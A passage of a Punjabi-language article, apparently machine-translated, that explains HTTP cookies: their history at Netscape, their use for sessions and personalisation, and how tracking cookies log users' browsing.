ਸੰਪਾਦਕਾਂ ਦੀ ਸਮੀਖਿਆ ਕਰੋ
Un ਕੂਕੀ ਜਾਂ ਵੈੱਬ ਕੂਕੀਜ਼ (ਜਾਂ ਕੂਕੀ, ਦੇ ਰੂਪ ਵਿੱਚ ਸੰਖੇਪ ਗਵਾਹ ਨੂੰ ਕਿਊਬਿਕ ਵਿੱਚ) ਨੂੰ HTTP ਸੰਚਾਰ ਪ੍ਰੋਟੋਕੋਲ ਦੁਆਰਾ ਇੱਕ HTTP ਸਰਵਰ ਦੁਆਰਾ ਇੱਕ HTTP ਕਲਾਇੰਟ ਨੂੰ ਭੇਜੀ ਗਈ ਜਾਣਕਾਰੀ ਦੇ ਇੱਕ ਕ੍ਰਮ ਵਜੋਂ ਪਰਿਭਾਸ਼ਿਤ ਕੀਤਾ ਗਿਆ ਹੈ, ਜੋ ਕਿ ਹਰ ਵਾਰ ਉਸੇ HTTP ਸਰਵਰ ਨੂੰ ਕੁਝ ਸ਼ਰਤਾਂ ਅਧੀਨ ਪੁੱਛਗਿੱਛ ਕਰਨ 'ਤੇ ਵਾਪਸ ਕਰਦਾ ਹੈ।
ਕੂਕੀ ਏ ਦੇ ਬਰਾਬਰ ਹੈ ਟਰਮੀਨਲ 'ਤੇ ਸਟੋਰ ਕੀਤੀ ਛੋਟੀ ਟੈਕਸਟ ਫਾਈਲ ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾ ਦਾ. 20 ਸਾਲਾਂ ਤੋਂ ਵੱਧ ਸਮੇਂ ਤੋਂ ਮੌਜੂਦ, ਉਹ ਵੈਬਸਾਈਟ ਡਿਵੈਲਪਰਾਂ ਨੂੰ ਉਹਨਾਂ ਦੇ ਨੈਵੀਗੇਸ਼ਨ ਦੀ ਸਹੂਲਤ ਲਈ ਉਪਭੋਗਤਾ ਡੇਟਾ ਨੂੰ ਸਟੋਰ ਕਰਨ ਅਤੇ ਕੁਝ ਕਾਰਜਸ਼ੀਲਤਾਵਾਂ ਦੀ ਆਗਿਆ ਦਿੰਦੇ ਹਨ। ਕੂਕੀਜ਼ ਹਮੇਸ਼ਾਂ ਘੱਟ ਜਾਂ ਘੱਟ ਵਿਵਾਦਪੂਰਨ ਰਹੀਆਂ ਹਨ ਕਿਉਂਕਿ ਉਹਨਾਂ ਵਿੱਚ ਬਾਕੀ ਬਚੀ ਨਿੱਜੀ ਜਾਣਕਾਰੀ ਹੁੰਦੀ ਹੈ ਜਿਸਦਾ ਸੰਭਾਵੀ ਤੌਰ 'ਤੇ ਤੀਜੀ ਧਿਰ ਦੁਆਰਾ ਸ਼ੋਸ਼ਣ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ।
ਇਹ ਵੈੱਬ ਸਰਵਰ ਦੁਆਰਾ ਵੈਬ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਇੱਕ HTTP ਸਿਰਲੇਖ ਦੇ ਤੌਰ 'ਤੇ ਭੇਜਿਆ ਜਾਂਦਾ ਹੈ ਜੋ ਹਰ ਵਾਰ ਸਰਵਰ ਤੱਕ ਪਹੁੰਚ ਕਰਨ 'ਤੇ ਇਸ ਨੂੰ ਬਿਨਾਂ ਬਦਲਾਅ ਵਾਪਸ ਕਰਦਾ ਹੈ। ਇੱਕ ਕੂਕੀ ਦੀ ਵਰਤੋਂ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ ਇੱਕ ਪ੍ਰਮਾਣਿਕਤਾ, ਇੱਕ ਸੈਸ਼ਨ (ਸਟੇਟ ਮੇਨਟੇਨੈਂਸ), ਅਤੇ ਲਈ ਉਪਭੋਗਤਾ ਬਾਰੇ ਖਾਸ ਜਾਣਕਾਰੀ ਸਟੋਰ ਕਰੋ, ਜਿਵੇਂ ਕਿ ਸਾਈਟ ਤਰਜੀਹਾਂ ਜਾਂ ਇਲੈਕਟ੍ਰਾਨਿਕ ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਦੀ ਸਮੱਗਰੀ। ਕੂਕੀ ਸ਼ਬਦ ਤੋਂ ਲਿਆ ਗਿਆ ਹੈ ਜਾਦੂ ਕੂਕੀਜ਼, UNIX ਕੰਪਿਊਟਿੰਗ ਵਿੱਚ ਇੱਕ ਜਾਣੀ-ਪਛਾਣੀ ਧਾਰਨਾ, ਜਿਸ ਨੇ ਬ੍ਰਾਊਜ਼ਰ ਕੂਕੀਜ਼ ਦੇ ਵਿਚਾਰ ਅਤੇ ਨਾਮ ਨੂੰ ਪ੍ਰੇਰਿਤ ਕੀਤਾ। ਕੂਕੀਜ਼ ਦੇ ਕੁਝ ਵਿਕਲਪ ਮੌਜੂਦ ਹਨ, ਹਰੇਕ ਦੇ ਆਪਣੇ ਉਪਯੋਗ, ਫਾਇਦੇ ਅਤੇ ਨੁਕਸਾਨ ਹਨ।
ਸਧਾਰਨ ਟੈਕਸਟ ਫਾਈਲਾਂ ਹੋਣ ਕਰਕੇ, ਕੂਕੀਜ਼ ਚੱਲਣਯੋਗ ਨਹੀਂ ਹਨ। ਉਹ ਨਹੀਂ ਹਨ ਨਾ ਹੀ ਸਪਾਈਵੇਅਰ ਅਤੇ ਨਾ ਹੀ ਵਾਇਰਸ, ਹਾਲਾਂਕਿ ਕੁਝ ਸਾਈਟਾਂ ਤੋਂ ਕੂਕੀਜ਼ ਨੂੰ ਬਹੁਤ ਸਾਰੇ ਐਂਟੀ-ਵਾਇਰਸ ਸੌਫਟਵੇਅਰ ਦੁਆਰਾ ਖੋਜਿਆ ਜਾਂਦਾ ਹੈ ਕਿਉਂਕਿ ਉਹ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਕਈ ਸਾਈਟਾਂ 'ਤੇ ਜਾਣ 'ਤੇ ਉਨ੍ਹਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੇ ਹਨ।
ਜ਼ਿਆਦਾਤਰ ਆਧੁਨਿਕ ਬ੍ਰਾਊਜ਼ਰ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਇਹ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੇ ਹਨ ਫੈਸਲਾ ਕਰੋ ਕਿ ਕੂਕੀਜ਼ ਨੂੰ ਸਵੀਕਾਰ ਕਰਨਾ ਹੈ ਜਾਂ ਅਸਵੀਕਾਰ ਕਰਨਾ ਹੈ. ਉਪਭੋਗਤਾ ਵੀ ਕਰ ਸਕਦੇ ਹਨ ਚੁਣੋ ਕਿ ਕੂਕੀਜ਼ ਕਿੰਨੀ ਦੇਰ ਤੱਕ ਸਟੋਰ ਕੀਤੀਆਂ ਜਾਣ. ਹਾਲਾਂਕਿ, ਕੂਕੀਜ਼ ਨੂੰ ਪੂਰੀ ਤਰ੍ਹਾਂ ਅਸਵੀਕਾਰ ਕਰਨਾ ਕੁਝ ਸਾਈਟਾਂ ਨੂੰ ਵਰਤੋਂਯੋਗ ਨਹੀਂ ਬਣਾਉਂਦਾ। ਉਦਾਹਰਨ ਲਈ, ਸ਼ਾਪਿੰਗ ਕਾਰਟਾਂ ਜਾਂ ਸਾਈਟਾਂ ਨੂੰ ਸਟੋਰ ਕਰੋ ਜਿਨ੍ਹਾਂ ਲਈ ਕ੍ਰੇਡੇੰਸ਼ਿਅਲ (ਉਪਭੋਗਤਾ ਨਾਮ ਅਤੇ ਪਾਸਵਰਡ) ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਲੌਗਇਨ ਦੀ ਲੋੜ ਹੁੰਦੀ ਹੈ।
ਸਮਗਰੀ ਦੀ ਸਾਰਣੀ
ਇਤਿਹਾਸਕ
ਮਿਆਦ ਕੂਕੀ ਅੰਗਰੇਜ਼ੀ ਸ਼ਬਦ ਤੋਂ ਲਿਆ ਗਿਆ ਹੈ ਜਾਦੂ ਕੂਕੀਜ਼, ਜੋ ਕਿ ਡੇਟਾ ਦਾ ਇੱਕ ਪੈਕੇਟ ਹੈ ਜੋ ਇੱਕ ਪ੍ਰੋਗਰਾਮ ਪ੍ਰਾਪਤ ਕਰਦਾ ਹੈ ਅਤੇ ਬਿਨਾਂ ਬਦਲੇ ਵਾਪਸ ਕਰਦਾ ਹੈ। ਕੂਕੀਜ਼ ਪਹਿਲਾਂ ਹੀ ਆਈਟੀ ਵਿੱਚ ਵਰਤੇ ਗਏ ਸਨ ਜਦੋਂ Lou Montulli ਉਹਨਾਂ ਨੂੰ ਵੈਬ ਸੰਚਾਰ ਵਿੱਚ ਵਰਤਣ ਦਾ ਵਿਚਾਰ ਸੀ ਜੂਨ 1994 ਵਿੱਚ. ਉਸ ਸਮੇਂ, ਉਹ ਨੈੱਟਸਕੇਪ ਕਮਿਊਨੀਕੇਸ਼ਨਜ਼ ਦੁਆਰਾ ਨਿਯੁਕਤ ਕੀਤਾ ਗਿਆ ਸੀ, ਜਿਸ ਨੇ ਇੱਕ ਕਲਾਇੰਟ ਲਈ ਇੱਕ ਈ-ਕਾਮਰਸ ਐਪਲੀਕੇਸ਼ਨ ਤਿਆਰ ਕੀਤੀ ਸੀ। ਕੂਕੀਜ਼ ਨੇ ਸਟੋਰ ਦੀ ਵਰਚੁਅਲ ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਲਾਗੂ ਕਰਨ ਦੀ ਭਰੋਸੇਯੋਗਤਾ ਦੀ ਸਮੱਸਿਆ ਦਾ ਹੱਲ ਦਿੱਤਾ ਹੈ।
ਜੌਨ ਗਿਆਨੈਂਡਰੀਆ ਅਤੇ ਲੂ ਮੋਂਟੁੱਲੀ ਨੇ ਉਸੇ ਸਾਲ ਨੈੱਟਸਕੇਪ ਦੀ ਪਹਿਲੀ ਕੁਕੀ ਸਪੈਸੀਫਿਕੇਸ਼ਨ ਲਿਖੀ। ਮੋਜ਼ੇਕ ਨੈੱਟਸਕੇਪ ਦਾ ਸੰਸਕਰਣ 0.9 ਬੀਟਾ, 13 ਅਕਤੂਬਰ 1994 ਨੂੰ ਜਾਰੀ ਕੀਤਾ ਗਿਆ, ਏਕੀਕ੍ਰਿਤ ਕੂਕੀ ਤਕਨਾਲੋਜੀ (ਪੋਸਟ ਵੇਖੋ). ਕੂਕੀਜ਼ ਦੀ ਪਹਿਲੀ (ਗੈਰ-ਪ੍ਰਯੋਗਾਤਮਕ) ਵਰਤੋਂ ਇਹ ਨਿਰਧਾਰਤ ਕਰਨ ਲਈ ਸੀ ਕਿ ਕੀ ਨੈੱਟਸਕੇਪ ਵੈਬਸਾਈਟ ਦੇ ਵਿਜ਼ਟਰ ਪਹਿਲਾਂ ਸਾਈਟ 'ਤੇ ਗਏ ਸਨ ਜਾਂ ਨਹੀਂ। ਮੋਂਟੁੱਲੀ ਨੇ 1995 ਵਿੱਚ ਕੂਕੀ ਤਕਨਾਲੋਜੀ ਲਈ ਇੱਕ ਪੇਟੈਂਟ ਅਰਜ਼ੀ ਦਾਇਰ ਕੀਤੀ, ਅਤੇ ਯੂਐਸ ਪੇਟੈਂਟ 5774670 ਦਿੱਤੀ ਗਈ। 1998 ਵਿੱਚ ਦਿੱਤੀ ਗਈ.
0.9 ਵਿੱਚ ਨੈੱਟਸਕੇਪ 1994 ਬੀਟਾ ਵਿੱਚ ਲਾਗੂ ਹੋਣ ਤੋਂ ਬਾਅਦ, ਕੂਕੀਜ਼ ਨੂੰ ਇੰਟਰਨੈੱਟ ਐਕਸਪਲੋਰਰ 2 ਵਿੱਚ ਜੋੜਿਆ ਗਿਆ, ਅਕਤੂਬਰ 1995 ਵਿੱਚ ਜਾਰੀ ਕੀਤਾ ਗਿਆ।
ਕੂਕੀਜ਼ ਦੀ ਜਾਣ-ਪਛਾਣ ਅਜੇ ਤੱਕ ਲੋਕਾਂ ਲਈ ਵਿਆਪਕ ਤੌਰ 'ਤੇ ਨਹੀਂ ਜਾਣੀ ਗਈ ਹੈ। ਖਾਸ ਤੌਰ 'ਤੇ, ਬ੍ਰਾਊਜ਼ਰ ਸੈਟਿੰਗਾਂ ਵਿੱਚ ਕੂਕੀਜ਼ ਨੂੰ ਮੂਲ ਰੂਪ ਵਿੱਚ ਸਵੀਕਾਰ ਕੀਤਾ ਗਿਆ ਸੀ, ਅਤੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਉਹਨਾਂ ਦੀ ਮੌਜੂਦਗੀ ਬਾਰੇ ਸੂਚਿਤ ਨਹੀਂ ਕੀਤਾ ਗਿਆ ਸੀ। ਕੁਝ ਲੋਕ 1995 ਦੀ ਪਹਿਲੀ ਤਿਮਾਹੀ ਦੇ ਆਸਪਾਸ ਕੁਕੀਜ਼ ਦੀ ਹੋਂਦ ਬਾਰੇ ਜਾਣੂ ਸਨ, ਪਰ ਆਮ ਲੋਕਾਂ ਨੇ 12 ਫਰਵਰੀ, 1996 ਨੂੰ ਫਾਈਨੈਂਸ਼ੀਅਲ ਟਾਈਮਜ਼ ਦੁਆਰਾ ਇੱਕ ਲੇਖ ਪ੍ਰਕਾਸ਼ਤ ਹੋਣ ਤੋਂ ਬਾਅਦ ਹੀ ਆਪਣੀ ਹੋਂਦ ਨੂੰ ਲੈ ਲਿਆ। ਉਸੇ ਸਾਲ, ਕੂਕੀਜ਼ ਨੇ ਮੀਡੀਆ ਦਾ ਬਹੁਤ ਧਿਆਨ ਪ੍ਰਾਪਤ ਕੀਤਾ। ਸੰਭਾਵਿਤ ਗੋਪਨੀਯਤਾ ਦੇ ਘੁਸਪੈਠ ਦੇ ਕਾਰਨ। 1996 ਅਤੇ 1997 ਵਿੱਚ ਅਮਰੀਕੀ ਫੈਡਰਲ ਟਰੇਡ ਕਮਿਸ਼ਨ ਦੇ ਦੋ ਸਲਾਹ-ਮਸ਼ਵਰੇ ਵਿੱਚ ਕੂਕੀਜ਼ ਦੇ ਵਿਸ਼ੇ 'ਤੇ ਚਰਚਾ ਕੀਤੀ ਗਈ ਸੀ।
ਅਧਿਕਾਰਤ ਕੂਕੀ ਨਿਰਧਾਰਨ ਦਾ ਵਿਕਾਸ ਪਹਿਲਾਂ ਹੀ ਚੱਲ ਰਿਹਾ ਸੀ। ਅਧਿਕਾਰਤ ਨਿਰਧਾਰਨ ਦੀ ਪਹਿਲੀ ਚਰਚਾ ਅਪ੍ਰੈਲ 1995 ਵਿੱਚ www-talk ਮੇਲਿੰਗ ਸੂਚੀ ਵਿੱਚ ਹੋਈ ਸੀ। ਇੱਕ ਵਿਸ਼ੇਸ਼ IETF ਕਾਰਜ ਸਮੂਹ ਦਾ ਗਠਨ ਕੀਤਾ ਗਿਆ ਸੀ. HTTP ਟ੍ਰਾਂਜੈਕਸ਼ਨਾਂ ਲਈ ਸਟੇਟ ਨੂੰ ਪੇਸ਼ ਕਰਨ ਲਈ ਦੋ ਵਿਕਲਪਿਕ ਪ੍ਰਸਤਾਵ ਕ੍ਰਮਵਾਰ ਬ੍ਰਾਇਨ ਬੇਹਲੇਨਡੋਰਫ ਅਤੇ ਡੇਵਿਡ ਕ੍ਰਿਸਟੋਲ ਦੁਆਰਾ ਪ੍ਰਸਤਾਵਿਤ ਕੀਤੇ ਗਏ ਸਨ, ਪਰ ਖੁਦ ਕ੍ਰਿਸਟੋਲ ਦੀ ਅਗਵਾਈ ਵਾਲੇ ਸਮੂਹ ਨੇ ਨੈੱਟਸਕੇਪ ਦੇ ਨਿਰਧਾਰਨ ਨੂੰ ਸ਼ੁਰੂਆਤੀ ਬਿੰਦੂ ਵਜੋਂ ਵਰਤਣ ਦਾ ਫੈਸਲਾ ਕੀਤਾ। ਫਰਵਰੀ 1996 ਵਿੱਚ, ਕਾਰਜ ਸਮੂਹ ਨੇ ਨਿਸ਼ਚਤ ਕੀਤਾ ਕਿ ਤੀਜੀ ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਗੋਪਨੀਯਤਾ ਲਈ ਇੱਕ ਮਹੱਤਵਪੂਰਨ ਖ਼ਤਰਾ ਹਨ। ਸਮੂਹ ਦੁਆਰਾ ਤਿਆਰ ਕੀਤੇ ਗਏ ਨਿਰਧਾਰਨ ਨੂੰ ਆਖਰਕਾਰ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤਾ ਗਿਆ ਸੀ RFC 2109.
2014 ਦੇ ਅੰਤ ਤੋਂ, ਅਸੀਂ ਕਈ ਸਾਈਟਾਂ 'ਤੇ ਕੂਕੀਜ਼ ਬਾਰੇ ਇੱਕ ਬੈਨਰ ਦੇਖਦੇ ਹਾਂ। ਘੱਟੋ-ਘੱਟ ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ ਐਕਸਟੈਂਸ਼ਨ ਹੈ ਜੋ ਇਸਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਬੈਨਰ ਪ੍ਰਦਰਸ਼ਿਤ ਨਹੀਂ ਕੀਤਾ ਗਿਆ.
ਕੂਕੀਜ਼ ਅਤੇ ਵਰਤੋਂ ਦੀਆਂ ਕਿਸਮਾਂ
ਸੈਸ਼ਨ ਪ੍ਰਬੰਧਨ
ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਨੈਵੀਗੇਸ਼ਨ ਦੌਰਾਨ ਉਪਭੋਗਤਾ ਡੇਟਾ ਨੂੰ ਬਰਕਰਾਰ ਰੱਖਣ ਲਈ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ, ਪਰ ਕਈ ਮੁਲਾਕਾਤਾਂ ਵਿੱਚ ਵੀ। ਕੂਕੀਜ਼ ਨੂੰ ਇਲੈਕਟ੍ਰਾਨਿਕ ਸ਼ਾਪਿੰਗ ਕਾਰਟਸ ਨੂੰ ਲਾਗੂ ਕਰਨ ਦਾ ਇੱਕ ਸਾਧਨ ਪ੍ਰਦਾਨ ਕਰਨ ਲਈ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ ਸੀ, ਇੱਕ ਵਰਚੁਅਲ ਯੰਤਰ ਜਿਸ ਵਿੱਚ ਉਪਭੋਗਤਾ ਸਾਈਟ ਨੂੰ ਬ੍ਰਾਊਜ਼ ਕਰਦੇ ਸਮੇਂ ਉਹ ਚੀਜ਼ਾਂ ਇਕੱਠੀਆਂ ਕਰ ਸਕਦਾ ਹੈ ਜੋ ਉਹ ਖਰੀਦਣਾ ਚਾਹੁੰਦਾ ਹੈ।
ਅੱਜਕੱਲ੍ਹ, ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਵਰਗੀਆਂ ਐਪਾਂ ਸਰਵਰ 'ਤੇ ਡੇਟਾਬੇਸ ਵਿੱਚ ਆਈਟਮਾਂ ਦੀ ਸੂਚੀ ਨੂੰ ਸਟੋਰ ਕਰਦੀਆਂ ਹਨ, ਜੋ ਕਿ ਤਰਜੀਹੀ ਹੈ; ਉਹਨਾਂ ਨੂੰ ਕੂਕੀ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕਰਨ ਨਾਲੋਂ। ਵੈੱਬ ਸਰਵਰ ਇੱਕ ਵਿਲੱਖਣ ਸੈਸ਼ਨ ID ਵਾਲੀ ਇੱਕ ਕੂਕੀ ਭੇਜਦਾ ਹੈ। ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਫਿਰ ਹਰ ਅਗਲੀ ਬੇਨਤੀ 'ਤੇ ਇਸ ਸੈਸ਼ਨ ID ਨੂੰ ਵਾਪਸ ਕਰਦਾ ਹੈ ਅਤੇ ਟੋਕਰੀ ਵਿੱਚ ਆਈਟਮਾਂ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ ਅਤੇ ਉਸੇ ਵਿਲੱਖਣ ਸੈਸ਼ਨ ID ਨਾਲ ਜੋੜਿਆ ਜਾਂਦਾ ਹੈ।
ਕੂਕੀਜ਼ ਦੀ ਵਾਰ-ਵਾਰ ਵਰਤੋਂ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਕਿਸੇ ਸਾਈਟ ਵਿੱਚ ਲੌਗਇਨ ਕਰਨ ਲਈ ਲਾਭਦਾਇਕ ਹੈ। ਸੰਖੇਪ ਵਿੱਚ, ਵੈੱਬ ਸਰਵਰ ਪਹਿਲਾਂ ਇੱਕ ਵਿਲੱਖਣ ਸੈਸ਼ਨ ID ਵਾਲੀ ਇੱਕ ਕੂਕੀ ਭੇਜਦਾ ਹੈ। ਫਿਰ ਉਪਭੋਗਤਾ ਆਪਣੇ ਪ੍ਰਮਾਣ ਪੱਤਰ ਪ੍ਰਦਾਨ ਕਰਦੇ ਹਨ (ਆਮ ਤੌਰ 'ਤੇ ਇੱਕ ਉਪਭੋਗਤਾ ਨਾਮ ਅਤੇ ਪਾਸਵਰਡ)। ਵੈਬ ਐਪਲੀਕੇਸ਼ਨ ਫਿਰ ਸੈਸ਼ਨ ਨੂੰ ਪ੍ਰਮਾਣਿਤ ਕਰਦੀ ਹੈ ਅਤੇ ਉਪਭੋਗਤਾ ਨੂੰ ਸੇਵਾ ਤੱਕ ਪਹੁੰਚ ਕਰਨ ਦੀ ਆਗਿਆ ਦਿੰਦੀ ਹੈ।
ਵਿਅਕਤੀਗਤ
ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਿਸੇ ਸਾਈਟ ਦੇ ਉਪਭੋਗਤਾ ਬਾਰੇ ਜਾਣਕਾਰੀ ਨੂੰ ਯਾਦ ਰੱਖਣ ਲਈ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ, ਤਾਂ ਜੋ ਉਸ ਨੂੰ ਭਵਿੱਖ ਵਿੱਚ ਉਚਿਤ ਸਮੱਗਰੀ ਦਿਖਾਈ ਜਾ ਸਕੇ। ਉਦਾਹਰਨ ਲਈ, ਇੱਕ ਵੈਬ ਸਰਵਰ ਇੱਕ ਕੂਕੀ ਭੇਜ ਸਕਦਾ ਹੈ ਜਿਸ ਵਿੱਚ ਉਸ ਵੈੱਬਸਾਈਟ 'ਤੇ ਲੌਗ ਇਨ ਕਰਨ ਲਈ ਵਰਤੇ ਗਏ ਆਖਰੀ ਉਪਭੋਗਤਾ ਨਾਮ ਦੀ ਵਰਤੋਂ ਕੀਤੀ ਗਈ ਹੈ, ਤਾਂ ਜੋ ਉਪਭੋਗਤਾ ਨਾਮ ਭਵਿੱਖ ਦੇ ਦੌਰੇ 'ਤੇ ਪਹਿਲਾਂ ਤੋਂ ਤਿਆਰ ਕੀਤਾ ਜਾ ਸਕੇ।
ਬਹੁਤ ਸਾਰੀਆਂ ਵੈੱਬਸਾਈਟਾਂ ਉਪਭੋਗਤਾ ਤਰਜੀਹਾਂ ਦੇ ਆਧਾਰ 'ਤੇ ਵਿਅਕਤੀਗਤਕਰਨ ਲਈ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਦੀਆਂ ਹਨ। ਉਪਭੋਗਤਾ ਇੱਕ ਫਾਰਮ ਵਿੱਚ ਆਪਣੀਆਂ ਤਰਜੀਹਾਂ ਦੀ ਚੋਣ ਕਰਦੇ ਹਨ ਅਤੇ ਇਹਨਾਂ ਨੂੰ ਸਰਵਰ ਨੂੰ ਜਮ੍ਹਾਂ ਕਰਦੇ ਹਨ। ਸਰਵਰ ਇੱਕ ਕੂਕੀ ਵਿੱਚ ਤਰਜੀਹਾਂ ਨੂੰ ਏਨਕੋਡ ਕਰਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਵਾਪਸ ਭੇਜਦਾ ਹੈ। ਇਸ ਤੋਂ ਬਾਅਦ, ਹਰ ਵਾਰ ਜਦੋਂ ਉਪਭੋਗਤਾ ਇਸ ਸਾਈਟ ਦੇ ਪੰਨੇ ਨੂੰ ਐਕਸੈਸ ਕਰਦਾ ਹੈ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਕੂਕੀ ਵਾਪਸ ਕਰਦਾ ਹੈ ਅਤੇ ਇਸ ਲਈ ਤਰਜੀਹਾਂ ਦੀ ਸੂਚੀ; ਸਰਵਰ ਫਿਰ ਉਪਭੋਗਤਾ ਦੀਆਂ ਤਰਜੀਹਾਂ ਦੇ ਅਨੁਸਾਰ ਪੰਨੇ ਨੂੰ ਅਨੁਕੂਲਿਤ ਕਰ ਸਕਦਾ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਵਿਕੀਪੀਡੀਆ ਵੈੱਬਸਾਈਟ ਆਪਣੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਆਪਣੀ ਪਸੰਦ ਦੀ ਸਾਈਟ ਦੀ ਚਮੜੀ ਦੀ ਚੋਣ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੀ ਹੈ। ਗੂਗਲ ਸਰਚ ਇੰਜਣ ਆਪਣੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ (ਭਾਵੇਂ ਉਹ ਰਜਿਸਟਰਡ ਨਾ ਹੋਣ) ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਉਹ ਨਤੀਜਿਆਂ ਦੀ ਗਿਣਤੀ ਚੁਣਨ ਲਈ ਜੋ ਉਹ ਹਰੇਕ ਨਤੀਜੇ ਪੰਨੇ 'ਤੇ ਦੇਖਣਾ ਚਾਹੁੰਦੇ ਹਨ।
ਟਰੈਕਿੰਗ
ਟਰੈਕਿੰਗ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾਵਾਂ ਦੀਆਂ ਬ੍ਰਾਊਜ਼ਿੰਗ ਆਦਤਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਇਹ ਕਿਸੇ ਪੰਨੇ ਲਈ ਬੇਨਤੀ ਕਰਨ ਵਾਲੇ ਕੰਪਿਊਟਰ ਦੇ IP ਐਡਰੈੱਸ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਜਾਂ 'ਰੈਫਰਰ' HTTP ਸਿਰਲੇਖ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਵੀ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ ਜੋ ਕਲਾਇੰਟ ਹਰ ਬੇਨਤੀ ਦੇ ਨਾਲ ਭੇਜਦਾ ਹੈ, ਪਰ ਕੂਕੀਜ਼ ਵਧੇਰੇ ਸ਼ੁੱਧਤਾ ਲਈ ਆਗਿਆ ਦਿੰਦੀਆਂ ਹਨ। ਇਹ ਹੇਠ ਦਿੱਤੀ ਉਦਾਹਰਨ ਵਿੱਚ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ:
- ਜੇਕਰ ਉਪਭੋਗਤਾ ਕਿਸੇ ਸਾਈਟ 'ਤੇ ਇੱਕ ਪੰਨੇ ਨੂੰ ਕਾਲ ਕਰਦਾ ਹੈ, ਅਤੇ ਬੇਨਤੀ ਵਿੱਚ ਇੱਕ ਕੂਕੀ ਸ਼ਾਮਲ ਨਹੀਂ ਹੈ, ਤਾਂ ਸਰਵਰ ਇਹ ਮੰਨਦਾ ਹੈ ਕਿ ਇਹ ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਦੇਖਿਆ ਗਿਆ ਪਹਿਲਾ ਪੰਨਾ ਹੈ। ਸਰਵਰ ਫਿਰ ਇੱਕ ਬੇਤਰਤੀਬ ਸਤਰ ਬਣਾਉਂਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ ਬੇਨਤੀ ਕੀਤੇ ਪੰਨੇ ਦੇ ਨਾਲ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਭੇਜਦਾ ਹੈ।
- ਇਸ ਪਲ ਤੋਂ, ਹਰ ਵਾਰ ਸਾਈਟ ਦੇ ਨਵੇਂ ਪੰਨੇ ਨੂੰ ਬੁਲਾਏ ਜਾਣ 'ਤੇ ਕੂਕੀ ਆਪਣੇ ਆਪ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਭੇਜੀ ਜਾਵੇਗੀ। ਸਰਵਰ ਆਮ ਵਾਂਗ ਪੰਨੇ ਨੂੰ ਭੇਜੇਗਾ, ਪਰ ਇੱਕ ਲੌਗ ਫਾਈਲ ਵਿੱਚ ਨਾਮਕ ਪੰਨੇ ਦੇ URL, ਮਿਤੀ, ਬੇਨਤੀ ਦਾ ਸਮਾਂ ਅਤੇ ਕੂਕੀ ਨੂੰ ਵੀ ਲੌਗ ਕਰੇਗਾ।
ਲੌਗ ਫਾਈਲ ਨੂੰ ਦੇਖ ਕੇ, ਇਹ ਦੇਖਣਾ ਸੰਭਵ ਹੈ ਕਿ ਉਪਭੋਗਤਾ ਕਿਹੜੇ ਪੰਨਿਆਂ 'ਤੇ ਗਿਆ ਹੈ ਅਤੇ ਕਿਸ ਕ੍ਰਮ ਵਿੱਚ ਹੈ। ਉਦਾਹਰਨ ਲਈ, ਜੇਕਰ ਫ਼ਾਈਲ ਵਿੱਚ id=abc ਕੂਕੀ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਕੀਤੀਆਂ ਗਈਆਂ ਕੁਝ ਬੇਨਤੀਆਂ ਹਨ, ਤਾਂ ਇਸ ਨਾਲ ਇਹ ਸਥਾਪਿਤ ਹੋ ਸਕਦਾ ਹੈ ਕਿ ਇਹ ਸਾਰੀਆਂ ਬੇਨਤੀਆਂ ਇੱਕੋ ਵਰਤੋਂਕਾਰ ਵੱਲੋਂ ਆਉਂਦੀਆਂ ਹਨ। ਬੇਨਤੀ ਕੀਤੀ ਗਈ URL, ਬੇਨਤੀਆਂ ਨਾਲ ਸਬੰਧਿਤ ਮਿਤੀ ਅਤੇ ਸਮਾਂ 